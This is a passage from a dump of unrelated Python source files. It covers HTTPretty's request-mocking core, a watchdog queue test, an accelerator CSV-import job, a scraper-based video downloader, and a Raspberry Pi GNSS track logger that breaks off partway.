% (method, self))
entry = entries_for_method[self.current_entries[method]]
if self.current_entries[method] != -1:
self.current_entries[method] += 1
# Attach more info to the entry
# So the callback can be more clever about what to do
# This does also fix the case where the callback
# would be handed a compiled regex as uri instead of the
# real uri
entry.info = info
entry.request = request
return entry
def __hash__(self):
return hash(text_type(self))
def __eq__(self, other):
return text_type(self) == text_type(other)
class httpretty(HttpBaseClass):
"""manages HTTPretty's internal request/response registry and request matching.
"""
_entries = {}
latest_requests = []
last_request = HTTPrettyRequestEmpty()
_is_enabled = False
allow_net_connect = True
@classmethod
def match_uriinfo(cls, info):
"""
:param info: an :py:class:`~httpretty.core.URIInfo`
:returns: a 2-item tuple: (:py:class:`~httpretty.core.URLMatcher`, :py:class:`~httpretty.core.URIInfo`) or ``(None, [])``
"""
items = sorted(
cls._entries.items(),
key=lambda matcher_entries: matcher_entries[0].priority,
reverse=True,
)
for matcher, value in items:
if matcher.matches(info):
return (matcher, info)
return (None, [])
@classmethod
def match_https_hostname(cls, hostname):
"""
:param hostname: a string
:returns: an :py:class:`~httpretty.core.URLMatcher` or ``None``
"""
items = sorted(
cls._entries.items(),
key=lambda matcher_entries: matcher_entries[0].priority,
reverse=True,
)
for matcher, value in items:
if matcher.info is None:
pattern_with_port = "https://{0}:".format(hostname)
pattern_without_port = "https://{0}/".format(hostname)
hostname_pattern = (
hostname_re
.match(matcher.regex.pattern)
.group(0)
)
for pattern in [pattern_with_port, pattern_without_port]:
if re.match(hostname_pattern, pattern):
return matcher
elif matcher.info.hostname == hostname:
return matcher
return None
@classmethod
def match_http_address(cls, hostname, port):
"""
:param hostname: a string
:param port: an integer
:returns: an :py:class:`~httpretty.core.URLMatcher` or ``None``
"""
items = sorted(
cls._entries.items(),
key=lambda matcher_entries: matcher_entries[0].priority,
reverse=True,
)
for matcher, value in items:
if matcher.info is None:
if port in POTENTIAL_HTTPS_PORTS:
scheme = 'https://'
else:
scheme = 'http://'
pattern_without_port = "{0}{1}/".format(scheme, hostname)
pattern_with_port = "{0}{1}:{2}/".format(scheme, hostname, port)
hostname_pattern = (
hostname_re
.match(matcher.regex.pattern)
.group(0)
)
for pattern in [pattern_with_port, pattern_without_port]:
if re.match(hostname_pattern, pattern):
return matcher
elif matcher.info.hostname == hostname \
and matcher.info.port == port:
return matcher
return None
@classmethod
@contextlib.contextmanager
def record(cls, filename, indentation=4, encoding='utf-8'):
"""
.. testcode::
import io
import json
import requests
import httpretty
with httpretty.record('/tmp/ip.json'):
data = requests.get('https://httpbin.org/ip').json()
with io.open('/tmp/ip.json') as fd:
assert data == json.load(fd)
:param filename: a string
:param indentation: an integer, defaults to **4**
:param encoding: a string, defaults to **"utf-8"**
:returns: a `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
try:
import urllib3
except ImportError:
msg = (
'HTTPretty requires urllib3 installed '
'for recording actual requests.'
)
raise RuntimeError(msg)
http = urllib3.PoolManager()
cls.enable()
calls = []
def record_request(request, uri, headers):
cls.disable()
kw = {}
kw.setdefault('body', request.body)
kw.setdefault('headers', dict(request.headers))
response = http.request(request.method, uri, **kw)
calls.append({
'request': {
'uri': uri,
'method': request.method,
'headers': dict(request.headers),
'body': decode_utf8(request.body),
'querystring': request.querystring
},
'response': {
'status': response.status,
'body': decode_utf8(response.data),
# urllib3 1.10 had a bug if you just did:
# dict(response.headers)
# which would cause all the values to become lists
# with the header name as the first item and the
# true value as the second item. Workaround that
'headers': dict(response.headers.items())
}
})
cls.enable()
return response.status, response.headers, response.data
for method in cls.METHODS:
cls.register_uri(method, MULTILINE_ANY_REGEX, body=record_request)
yield
cls.disable()
with codecs.open(filename, 'w', encoding) as f:
f.write(json.dumps(calls, indent=indentation))
@classmethod
@contextlib.contextmanager
def playback(cls, filename):
"""
.. testcode::
import io
import json
import requests
import httpretty
with httpretty.record('/tmp/ip.json'):
data = requests.get('https://httpbin.org/ip').json()
with io.open('/tmp/ip.json') as fd:
assert data == json.load(fd)
:param filename: a string
:returns: a `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
cls.enable()
data = json.loads(open(filename).read())
for item in data:
uri = item['request']['uri']
method = item['request']['method']
body = item['response']['body']
headers = item['response']['headers']
cls.register_uri(method, uri, body=body, forcing_headers=headers)
yield
cls.disable()
@classmethod
def reset(cls):
"""resets the internal state of HTTPretty, unregistering all URLs
"""
POTENTIAL_HTTP_PORTS.intersection_update(DEFAULT_HTTP_PORTS)
POTENTIAL_HTTPS_PORTS.intersection_update(DEFAULT_HTTPS_PORTS)
cls._entries.clear()
cls.latest_requests = []
cls.last_request = HTTPrettyRequestEmpty()
@classmethod
def historify_request(cls, headers, body='', append=True):
"""appends request to a list for later retrieval
.. testcode::
import httpretty
httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip', body='')
with httpretty.enabled():
requests.get('https://httpbin.org/ip')
assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
"""
request = HTTPrettyRequest(headers, body)
cls.last_request = request
if append or not cls.latest_requests:
cls.latest_requests.append(request)
else:
cls.latest_requests[-1] = request
return request
@classmethod
def register_uri(cls, method, uri, body='{"message": "HTTPretty :)"}',
adding_headers=None,
forcing_headers=None,
status=200,
responses=None,
match_querystring=False,
priority=0,
**headers):
"""
.. testcode::
import httpretty
def request_callback(request, uri, response_headers):
content_type = request.headers.get('Content-Type')
assert request.body == '{"nothing": "here"}', 'unexpected body: {}'.format(request.body)
assert content_type == 'application/json', 'expected application/json but received Content-Type: {}'.format(content_type)
return [200, response_headers, json.dumps({"hello": "world"})]
httpretty.register_uri(
HTTPretty.POST, "https://httpretty.example.com/api",
body=request_callback)
with httpretty.enabled():
requests.post('https://httpretty.example.com/api', data='{"nothing": "here"}', headers={'Content-Type': 'application/json'})
assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
:param method: one of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``
:param uri: a string (e.g.: **"https://httpbin.org/ip"**)
:param body: a string, defaults to ``{"message": "HTTPretty :)"}``
:param adding_headers: dict - headers to be added to the response
:param forcing_headers: dict - headers to be forcefully set in the response
:param status: an integer, defaults to **200**
:param responses: a list of entries, ideally each created with :py:meth:`~httpretty.core.httpretty.Response`
:param priority: an integer, useful for setting higher priority over previously registered urls. defaults to zero
:param match_querystring: bool - whether to take the querystring into account when matching an URL
:param headers: headers to be added to the response
.. warning:: When using a port in the request, add a trailing slash if no path is provided otherwise Httpretty will not catch the request. Ex: ``httpretty.register_uri(httpretty.GET, 'http://fakeuri.com:8080/', body='{"hello":"world"}')``
"""
uri_is_string = isinstance(uri, basestring)
if uri_is_string and re.search(r'^\w+://[^/]+[.]\w{2,}$', uri):
uri += '/'
if isinstance(responses, list) and len(responses) > 0:
for response in responses:
response.uri = uri
response.method = method
entries_for_this_uri = responses
else:
headers[str('body')] = body
headers[str('adding_headers')] = adding_headers
headers[str('forcing_headers')] = forcing_headers
headers[str('status')] = status
entries_for_this_uri = [
cls.Response(method=method, uri=uri, **headers),
]
matcher = URIMatcher(uri, entries_for_this_uri,
match_querystring, priority)
if matcher in cls._entries:
matcher.entries.extend(cls._entries[matcher])
del cls._entries[matcher]
cls._entries[matcher] = entries_for_this_uri
def __str__(self):
return '<HTTPretty with %d URI entries>' % len(self._entries)
@classmethod
def Response(
cls, body,
method=None,
uri=None,
adding_headers=None,
forcing_headers=None,
status=200,
streaming=False,
**kw):
"""
shortcut to create an :py:class:`~httpretty.core.Entry` that takes the body as first positional argument
.. seealso:: the parameters of this function match those of the :py:class:`~httpretty.core.Entry` constructor
:param body:
:param method: one of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``
:param uri:
:param adding_headers:
:param forcing_headers:
:param status: defaults to **200**
:param streaming: defaults to **False**
:param kw: keyword-arguments passed onto the :py:class:`~httpretty.core.Entry`
:returns: an :py:class:`~httpretty.core.Entry`
"""
kw['body'] = body
kw['adding_headers'] = adding_headers
kw['forcing_headers'] = forcing_headers
kw['status'] = int(status)
kw['streaming'] = streaming
return Entry(method, uri, **kw)
@classmethod
def disable(cls):
"""Disables HTTPretty entirely, putting the original :py:mod:`socket`
module back in its place.
.. code::
import re, json
import httpretty
httpretty.enable()
# request passes through fake socket
response = requests.get('https://httpbin.org')
httpretty.disable()
# request uses real python socket module
response = requests.get('https://httpbin.org')
.. note:: This method does not call :py:meth:`httpretty.core.reset` automatically.
"""
cls._is_enabled = False
socket.socket = old_socket
socket.SocketType = old_SocketType
socket._socketobject = old_socket
socket.create_connection = old_create_connection
socket.gethostname = old_gethostname
socket.gethostbyname = old_gethostbyname
socket.getaddrinfo = old_getaddrinfo
socket.__dict__['socket'] = old_socket
socket.__dict__['_socketobject'] = old_socket
socket.__dict__['SocketType'] = old_SocketType
socket.__dict__['create_connection'] = old_create_connection
socket.__dict__['gethostname'] = old_gethostname
socket.__dict__['gethostbyname'] = old_gethostbyname
socket.__dict__['getaddrinfo'] = old_getaddrinfo
if socks:
socks.socksocket = old_socksocket
socks.__dict__['socksocket'] = old_socksocket
if ssl:
ssl.wrap_socket = old_ssl_wrap_socket
ssl.SSLSocket = old_sslsocket
try:
ssl.SSLContext.wrap_socket = old_sslcontext_wrap_socket
except AttributeError:
pass
ssl.__dict__['wrap_socket'] = old_ssl_wrap_socket
ssl.__dict__['SSLSocket'] = old_sslsocket
if not PY3:
ssl.sslwrap_simple = old_sslwrap_simple
ssl.__dict__['sslwrap_simple'] = old_sslwrap_simple
if requests_urllib3_connection is not None:
requests_urllib3_connection.ssl_wrap_socket = \
old_requests_ssl_wrap_socket
requests_urllib3_connection.__dict__['ssl_wrap_socket'] = \
old_requests_ssl_wrap_socket
@classmethod
def is_enabled(cls):
"""Check if HTTPretty is enabled
:returns: bool
.. testcode::
import httpretty
httpretty.enable()
assert httpretty.is_enabled() == True
httpretty.disable()
assert httpretty.is_enabled() == False
"""
return cls._is_enabled
@classmethod
def enable(cls, allow_net_connect=True):
"""Enables HTTPretty.
When ``allow_net_connect`` is ``False`` any connection to an unregistered uri will throw :py:class:`httpretty.errors.UnmockedError`.
.. testcode::
import re, json
import httpretty
httpretty.enable()
httpretty.register_uri(
httpretty.GET,
re.compile(r'http://.*'),
body=json.dumps({'man': 'in', 'the': 'middle'})
)
response = requests.get('https://foo.bar/foo/bar')
response.json().should.equal({
"man": "in",
"the": "middle",
})
.. warning:: after calling this method the original :py:mod:`socket` is replaced with :py:class:`httpretty.core.fakesock`. Make sure to call :py:meth:`~httpretty.disable` after done with your tests or use the :py:class:`httpretty.enabled` as decorator or `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
cls.allow_net_connect = allow_net_connect
cls._is_enabled = True
# Some versions of python internally shadowed the
# SocketType variable incorrectly https://bugs.python.org/issue20386
bad_socket_shadow = (socket.socket != socket.SocketType)
socket.socket = fakesock.socket
socket._socketobject = fakesock.socket
if not bad_socket_shadow:
socket.SocketType = fakesock.socket
socket.create_connection = create_fake_connection
socket.gethostname = fake_gethostname
socket.gethostbyname = fake_gethostbyname
socket.getaddrinfo = fake_getaddrinfo
socket.__dict__['socket'] = fakesock.socket
socket.__dict__['_socketobject'] = fakesock.socket
if not bad_socket_shadow:
socket.__dict__['SocketType'] = fakesock.socket
socket.__dict__['create_connection'] = create_fake_connection
socket.__dict__['gethostname'] = fake_gethostname
socket.__dict__['gethostbyname'] = fake_gethostbyname
socket.__dict__['getaddrinfo'] = fake_getaddrinfo
if socks:
socks.socksocket = fakesock.socket
socks.__dict__['socksocket'] = fakesock.socket
if ssl:
new_wrap = partial(fake_wrap_socket, old_ssl_wrap_socket)
ssl.wrap_socket = new_wrap
ssl.SSLSocket = FakeSSLSocket
try:
ssl.SSLContext.wrap_socket = partial(fake_wrap_socket, old_sslcontext_wrap_socket)
except AttributeError:
pass
ssl.__dict__['wrap_socket'] = new_wrap
ssl.__dict__['SSLSocket'] = FakeSSLSocket
if not PY3:
ssl.sslwrap_simple = new_wrap
ssl.__dict__['sslwrap_simple'] = new_wrap
if requests_urllib3_connection is not None:
new_wrap = partial(fake_wrap_socket, old_requests_ssl_wrap_socket)
requests_urllib3_connection.ssl_wrap_socket = new_wrap
requests_urllib3_connection.__dict__['ssl_wrap_socket'] = new_wrap
class httprettized(object):
"""`context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_ for enabling HTTPretty.
.. testcode::
import json
import httpretty
httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip', body=json.dumps({'origin': '42.42.42.42'}))
with httpretty.enabled():
response = requests.get('https://httpbin.org/ip')
assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
assert response.json() == {'origin': '42.42.42.42'}
"""
def __init__(self, allow_net_connect=True):
self.allow_net_connect = allow_net_connect
def __enter__(self):
httpretty.reset()
httpretty.enable(allow_net_connect=self.allow_net_connect)
def __exit__(self, exc_type, exc_value, traceback):
httpretty.disable()
httpretty.reset()
def httprettified(test=None, allow_net_connect=True):
"""decorator for test functions
.. tip:: Also available under the alias :py:func:`httpretty.activate`
:param test: a callable
example usage with `nosetests <https://nose.readthedocs.io/en/latest/>`_
.. testcode::
import sure
from httpretty import httprettified
@httprettified
def test_using_nosetests():
httpretty.register_uri(
httpretty.GET,
'https://httpbin.org/ip'
)
response = requests.get('https://httpbin.org/ip')
response.json().should.equal({
"message": "HTTPretty :)"
})
example usage with `unittest module <https://docs.python.org/3/library/unittest.html>`_
.. testcode::
import unittest
from sure import expect
from httpretty import httprettified
@httprettified
class TestWithPyUnit(unittest.TestCase):
def test_httpbin(self):
httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip')
response = requests.get('https://httpbin.org/ip')
expect(response.json()).to.equal({
"message": "HTTPretty :)"
})
"""
def decorate_unittest_TestCase_setUp(klass):
# Prefer addCleanup (added in python 2.7), but fall back
# to using tearDown if it isn't available
use_addCleanup = hasattr(klass, 'addCleanup')
original_setUp = (klass.setUp
if hasattr(klass, 'setUp')
else None)
def new_setUp(self):
httpretty.reset()
httpretty.enable(allow_net_connect)
if use_addCleanup:
self.addCleanup(httpretty.disable)
if original_setUp:
original_setUp(self)
klass.setUp = new_setUp
if not use_addCleanup:
original_tearDown = (klass.setUp
if hasattr(klass, 'tearDown')
else None)
def new_tearDown(self):
httpretty.disable()
httpretty.reset()
if original_tearDown:
original_tearDown(self)
klass.tearDown = new_tearDown
return klass
def decorate_test_methods(klass):
for attr in dir(klass):
if not attr.startswith('test_'):
continue
attr_value = getattr(klass, attr)
if not hasattr(attr_value, "__call__"):
continue
setattr(klass, attr, decorate_callable(attr_value))
return klass
def is_unittest_TestCase(klass):
try:
import unittest
return issubclass(klass, unittest.TestCase)
except ImportError:
return False
"A decorator for tests that use HTTPretty"
def decorate_class(klass):
if is_unittest_TestCase(klass):
return decorate_unittest_TestCase_setUp(klass)
return decorate_test_methods(klass)
def decorate_callable(test):
@functools.wraps(test)
def wrapper(*args, **kw):
with httprettized(allow_net_connect):
return test(*args, **kw)
return wrapper
if isinstance(test, ClassTypes):
return decorate_class(test)
elif callable(test):
return decorate_callable(test)
return decorate_callable
|
test_watchdog_utils_bricks.py | # -*- coding: utf-8 -*-
import threading
from nose.tools import \
assert_equal, \
assert_true
try:
import queue # IGNORE:F0401
except ImportError:
import Queue as queue # IGNORE:F0401
from watchdog.events import DirModifiedEvent, FileModifiedEvent
from watchdog.utils.bricks import OrderedSetQueue
class TestOrderedSetQueue:
def test_behavior_ordered_set(self):
dir_mod_event = DirModifiedEvent("/path/x")
file_mod_event = FileModifiedEvent('/path/y')
event_list = [
dir_mod_event,
dir_mod_event,
dir_mod_event,
dir_mod_event,
dir_mod_event,
file_mod_event,
file_mod_event,
dir_mod_event,
dir_mod_event,
dir_mod_event,
dir_mod_event,
dir_mod_event,
file_mod_event,
file_mod_event,
dir_mod_event,
dir_mod_event,
dir_mod_event,
dir_mod_event,
dir_mod_event,
file_mod_event,
file_mod_event,
file_mod_event,
file_mod_event,
]
event_set = set(event_list)
event_queue = OrderedSetQueue()
for event in event_list:
event_queue.put(event)
def event_consumer(in_queue):
events = []
while True:
try:
event = in_queue.get(block=True, timeout=0.2)
events.append(event)
in_queue.task_done()
except queue.Empty:
break
# Check set behavior.
assert_true(len(set(events)) == len(events))
assert_equal(set(events), event_set)
# Check order.
assert_equal(events[0], dir_mod_event)
assert_equal(events[1], file_mod_event)
consumer_thread = threading.Thread(target=event_consumer, args=(event_queue,))
consumer_thread.start()
consumer_thread.join()
|
a_csvimport.py | ############################################################################
# #
# Copyright (c) 2019 Carl Drougge #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
############################################################################
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
description = r'''
CSV file to dataset.
Read a CSV file (can be gziped), with any single iso-8859-1 character
separator (including \0) or no separator at all (always one field per line)
with or without quotes. Any single iso-8859-1 character or both \n and \r\n
(default) as newline. Labels from first line or specified in options.
If allow_bad is set also creates a "bad" dataset containing lineno and data
from bad lines.
If comment or skip_lines is set also creates a "skipped" dataset containing
lineno and data from skipped lines.
If you want lineno for good lines too set lineno_label.
'''
import os
from multiprocessing import Process
from threading import Thread
import struct
import locale
from accelerator.extras import OptionString, DotDict
from accelerator.dataset import DatasetWriter
from accelerator.sourcedata import typed_reader
from accelerator.compat import setproctitle, uni
from accelerator import blob
from accelerator.report import Report
from . import csvimport
depend_extra = (csvimport,)
options = dict(
filename = OptionString,
separator = ',', # Single iso-8859-1 character or empty for a single field.
comment = '', # Single iso-8859-1 character or empty, lines beginning with this character are ignored.
newline = '', # Empty means \n or \r\n, or you can specify any single iso-8859-1 character.
quotes = '', # Empty or False means no quotes, True means both ' and ", any other character means itself.
labelsonfirstline = True,
labels = [], # Mandatory if not labelsonfirstline, always sets labels if set.
rename = {}, # Labels to replace (if they are in the file) (happens first)
discard = set(), # Labels to not include (if they are in the file)
lineno_label = "", # Label of column to store line number in (not stored if empty).
allow_bad = False, # Still succeed if some lines have too few/many fields or bad quotes
# creates a "bad" dataset containing lineno and data from the bad lines.
skip_lines = 0, # skip this many lines at the start of the file.
compression = 6, # gzip level
)
datasets = ('previous', )
cstuff = csvimport.init()
def reader_status(status_fd, update):
# try to get nicer number formating
try:
locale.resetlocale(locale.LC_NUMERIC)
except Exception:
pass
count = 0
while True:
update('{0:n} lines read'.format(count))
data = os.read(status_fd, 8)
if not data:
break
count = struct.unpack("=Q", data)[0]
def reader_process(slices, filename, write_fds, labels_fd, success_fd, status_fd, comment_char, lf_char):
# Terrible hack - try to close FDs we didn't want in this process.
# (This is important, if the main process dies this won't be
# detected if we still have these open.)
keep_fds = set(write_fds)
keep_fds.add(labels_fd)
keep_fds.add(success_fd)
keep_fds.add(status_fd)
# a few extra to be safe.
for fd in range(3, max(keep_fds) + 32):
if fd not in keep_fds:
try:
os.close(fd)
except OSError:
pass
setproctitle("reader")
res = cstuff.backend.reader(filename.encode("ascii"), slices, options.skip_lines, write_fds, labels_fd, status_fd, comment_char, lf_char)
os.write(success_fd, b"\x01" if res else b"\0")
os.close(success_fd)
def char2int(name, empty_value, specials="empty"):
char = options.get(name)
if not char:
return empty_value
msg = "%s must be a single iso-8859-1 character (or %s)" % (name, specials,)
if isinstance(char, bytes):
char = uni(char)
try:
char = char.encode("iso-8859-1")
except UnicodeEncodeError:
raise Exception(msg)
assert len(char) == 1, msg
return cstuff.backend.char2int(char)
def prepare(job, slices):
# use 256 as a marker value, because that's not a possible char value (assuming 8 bit chars)
lf_char = char2int("newline", 256)
# separator uses lf_char or \n as the empty value, because memchr might mishandle 256.
separator = char2int("separator", 10 if lf_char == 256 else lf_char)
comment_char = char2int("comment", 256)
if options.quotes == 'True':
quote_char = 256
elif options.quotes == 'False':
quote_char = 257
else:
quote_char = char2int("quotes", 257, "True/False/empty")
filename = os.path.join(job.source_directory, options.filename)
orig_filename = filename
assert 1 <= options.compression <= 9
fds = [os.pipe() for _ in range(slices)]
read_fds = [t[0] for t in fds]
write_fds = [t[1] for t in fds]
if options.labelsonfirstline:
labels_rfd, labels_wfd = os.pipe()
else:
labels_wfd = -1
success_rfd, success_wfd = os.pipe()
status_rfd, status_wfd = os.pipe()
p = Process(target=reader_process, name="reader", args=(slices, filename, write_fds, labels_wfd, success_wfd, status_wfd, comment_char, lf_char))
p.start()
for fd in write_fds:
os.close(fd)
os.close(success_wfd)
os.close(status_wfd)
if options.labelsonfirstline:
os.close(labels_wfd)
# re-use import logic
out_fns = ["labels"]
r_num = cstuff.mk_uint64(3)
res = cstuff.backend.import_slice(*cstuff.bytesargs(labels_rfd, -1, -1, -1, out_fns, b"wb1", separator, r_num, quote_char, lf_char, 0))
os.close(labels_rfd)
assert res == 0, "c backend failed in label parsing"
with typed_reader("bytes")("labels") as fh:
labels_from_file = [lab.decode("utf-8", "backslashreplace") for lab in fh]
os.unlink("labels")
else:
labels_from_file = None
labels = options.labels or labels_from_file
assert labels, "No labels"
labels = [options.rename.get(x, x) for x in labels]
assert '' not in labels, "Empty label for column %d" % (labels.index(''),)
assert len(labels) == len(set(labels)), "Duplicate labels: %r" % (labels,)
dw = DatasetWriter(
columns={n: 'bytes' for n in labels if n not in options.discard},
filename=orig_filename,
caption='csvimport of ' + orig_filename,
previous=datasets.previous,
meta_only=True,
)
if options.lineno_label:
dw.add(options.lineno_label, "int64")
if options.allow_bad:
bad_dw = DatasetWriter(
name="bad",
columns=dict(lineno="int64", data="bytes"),
caption='bad lines from csvimport of ' + orig_filename,
meta_only=True,
)
else:
bad_dw = None
if options.comment or options.skip_lines:
skipped_dw = DatasetWriter(
name="skipped",
columns=dict(lineno="int64", data="bytes"),
caption='skipped lines from csvimport of ' + orig_filename,
meta_only=True,
)
else:
skipped_dw = None
return separator, quote_char, lf_char, filename, orig_filename, labels, dw, bad_dw, skipped_dw, read_fds, success_rfd, status_rfd,
def analysis(sliceno, slices, prepare_res, update_top_status):
separator, quote_char, lf_char, filename, _, labels, dw, bad_dw, skipped_dw, fds, _, status_fd, = prepare_res
if sliceno == 0:
t = Thread(
target=reader_status,
args=(status_fd, update_top_status),
name='reader status',
)
t.daemon = True
t.start()
else:
os.close(status_fd)
# Close the FDs for all other slices.
# Not techically necessary, but it feels like a good idea.
for ix, fd in enumerate(fds):
if ix != sliceno:
os.close(fd)
out_fns = []
for label in labels:
if label in options.discard:
out_fns.append(cstuff.NULL)
else:
out_fns.append(dw.column_filename(label))
for extra_dw in (bad_dw, skipped_dw):
if extra_dw:
for n in ("lineno", "data"):
out_fns.append(extra_dw.column_filename(n))
else:
out_fns.append(cstuff.NULL)
out_fns.append(cstuff.NULL)
if options.lineno_label:
out_fns.append(dw.column_filename(options.lineno_label))
else:
out_fns.append(cstuff.NULL)
r_num = cstuff.mk_uint64(3) # [good_count, bad_count, comment_count]
gzip_mode = b"wb%d" % (options.compression,)
res = cstuff.backend.import_slice(*cstuff.bytesargs(fds[sliceno], sliceno, slices, len(labels), out_fns, gzip_mode, separator, r_num, quote_char, lf_char, options.allow_bad))
assert res == 0, "c backend failed in slice %d" % (sliceno,)
os.close(fds[sliceno])
return list(r_num)
def synthesis(prepare_res, analysis_res):
separator, _, _, filename, _, labels, dw, bad_dw, skipped_dw, fds, success_fd, _, = prepare_res
# Analysis may have gotten a perfectly legitimate EOF if something
# went wrong in the reader process, so we need to check that all
# went well.
try:
reader_res = os.read(success_fd, 1)
except OSError:
reader_res = None
if reader_res != b"\0":
raise Exception("Reader process failed")
good_counts = []
bad_counts = []
skipped_counts = []
for sliceno, (good_count, bad_count, skipped_count) in enumerate(analysis_res):
dw.set_lines(sliceno, good_count)
if bad_dw:
bad_dw.set_lines(sliceno, bad_count)
if skipped_dw:
skipped_dw.set_lines(sliceno, skipped_count)
good_counts.append(good_count)
bad_counts.append(bad_count)
skipped_counts.append(skipped_count)
res = DotDict(
num_lines=sum(good_counts),
lines_per_slice=good_counts,
num_broken_lines=sum(bad_counts),
broken_lines_per_slice=bad_counts,
num_skipped_lines=sum(skipped_counts),
skipped_lines_per_slice=skipped_counts,
)
blob.save(res, 'import')
write_report(res, labels)
def write_report(res, labels):
with Report() as r:
divider = (res.num_lines + res.num_broken_lines + res.num_skipped_lines) or 1
r.println("Number of rows read\n")
r.write(" slice lines")
if res.num_broken_lines:
r.write(" broken")
if res.num_skipped_lines:
r.write(" skipped")
r.write("\n")
for sliceno, (good_cnt, bad_cnt, skipped_cnt) in enumerate(zip(res.lines_per_slice, res.broken_lines_per_slice, res.skipped_lines_per_slice)):
r.write(" %5d %9d (%6.2f%%)" % (sliceno, good_cnt, 100 * good_cnt / divider,))
if res.num_broken_lines:
r.write(" %9d (%6.2f%%)" % (bad_cnt, 100 * bad_cnt / divider,))
if res.num_skipped_lines:
r.write(" %9d (%6.2f%%)" % (skipped_cnt, 100 * skipped_cnt / divider,))
r.write("\n")
r.write(" total %9d" % (res.num_lines,))
if res.num_broken_lines or res.num_skipped_lines:
r.write(" (%6.2f%%)" % (100 * res.num_lines / divider,))
if res.num_broken_lines:
r.write(" %9d (%6.2f%%)" % (res.num_broken_lines, 100 * res.num_broken_lines / divider,))
if res.num_skipped_lines:
r.write(" %9d (%6.2f%%)" % (res.num_skipped_lines, 100 * res.num_skipped_lines / divider,))
r.write("\n")
r.line()
r.println('Number of columns %5d' % len(labels,))
|
downloader.py | #!/usr/bin/env python2
import sys
import urllib2
import urllib
from bs4 import BeautifulSoup
import traceback
import dao
from threading import Thread
def download(vUrl, out):
# uses savido to download video
url = "http://www.savido.net/download?url=" + vUrl
doc = urllib2.urlopen(url).read()
soup = BeautifulSoup(doc, "lxml")
# get the download link
vid = soup.select("td > a")[0].get("href")
urllib.urlretrieve(vid, "%s.mp4" % out)
def downloadVids():
while True:
try:
video = dao.getToDownload()
url = video["url"]
print "Dowloading " + url
outfile = "%s/%s" % (sys.argv[1], video["id"])
download(url, outfile)
dao.addUrl(video["urlid"], url, 4 if video["status"] == 3 else 5)
print "--Downloaded " + url
except Exception, e:
print >> sys.stderr, "DL " + type(e).__name__ + " " + str(e) + " " + url
traceback.print_exc()
if __name__ == "__main__":
threads = []
downloadThreads = 1
try:
downloadThreads = int(sys.argv[2])
except IndexError:
pass
for i in range(0, downloadThreads):
t = Thread(target=downloadVids)
t.setDaemon(True)
t.start()
threads.append(t)
running = True
while running:
running = False
for t in threads:
if t.isAlive():
running = True
break
|
app.py | #!/usr/bin/python
import RPi.GPIO as GPIO
from serial import Serial
import time
import threading
import os
import sys
# BUTTON
BUTTON_GPIO_PIN = 4
SHORT_PRESS_TICKS = 5
LONG_PRESS_TICKS = 200
TICK_TIME = 0.01
DOWN = 0
# LED
LED_GPIO_PIN = 18
SLOW_FLASH_TIMES = [1,1]
FAST_FLASH_TIMES = [0.2,0.2]
# Global Navigation Satellite System (GNSS): GPS, GLONASS, Galileo, ...
BAUDRATE = 9600
PORT = '/dev/ttyAMA0'
class ButtonControl(threading.Thread):
class ButtonPressStates():
NOTPRESSED = 0
SHORTPRESS = 1
LONGPRESS = 2
def __init__(self, gpio_pin):
threading.Thread.__init__(self)
self.gpio_pin = gpio_pin
self.__current_state = self.ButtonPressStates.NOTPRESSED
self.shortPressTicks = SHORT_PRESS_TICKS
self.longPressTicks = LONG_PRESS_TICKS
self.tickTime = TICK_TIME
GPIO.setup(self.gpio_pin, GPIO.IN)
def get(self):
return GPIO.input(self.gpio_pin)
def is_pressed(self):
buttonPressed = False
if GPIO.input(self.gpio_pin) == DOWN:
buttonPressed = True
return buttonPressed
def run(self):
self.__running = True
self.__current_state = self.ButtonPressStates.NOTPRESSED
while self.is_pressed():
time.sleep(self.tickTime)
while self.__running:
while self.is_pressed() == False and self.__running:
time.sleep(self.tickTime)
ticks = 0
while self.is_pressed() == True and self.__running:
ticks += 1
time.sleep(self.tickTime)
if ticks > self.shortPressTicks and ticks < self.longPressTicks:
self.__current_state = self.ButtonPressStates.SHORTPRESS
if ticks >= self.longPressTicks:
self.__current_state = self.ButtonPressStates.LONGPRESS
time.sleep(0.5)
def get_state(self):
return self.__current_state
def set_not_pressed(self):
self.__current_state = self.ButtonPressStates.NOTPRESSED
def stopController(self):
self.__running = False
class GnssControl(threading.Thread):
class GnssStates():
STOP = 0
PAUSE = 1
RECORD = 2
def __init__(self):
threading.Thread.__init__(self)
self.__running = False
self.__current_state = self.GnssStates.STOP
self.serialGnss = Serial()
self.serialGnss.baudrate = BAUDRATE
self.serialGnss.port = PORT
self.serialGnss.timeout = 4
self.serialGnss.open()
self.fileDescriptor = open('/home/pi/track-%s.nmea' %time.strftime('%Y%m%d%H%M%S'), 'a')
def set_stopped(self):
self.__current_state = self.GnssStates.STOP
self.__running = False
self.fileDescriptor.close()
def set_paused(self):
self.__current_state = self.GnssStates.PAUSE
def run(self):
self.__running = True
while self.__running:
sentence = self.serialGnss.readline()
sentenceStr = str(sentence)
if self.__current_state == self.GnssStates.RECORD:
if(sentence.find('$GP') > 0):
self.fileDescriptor.write('{0:}'.format(sentenceStr))
def set_recording(self):
self.__current_state = self.GnssStates.RECORD
def get_state(self):
return self.__current_state
class LedControl():
class LedStates():
OFF = 0
ON = 1
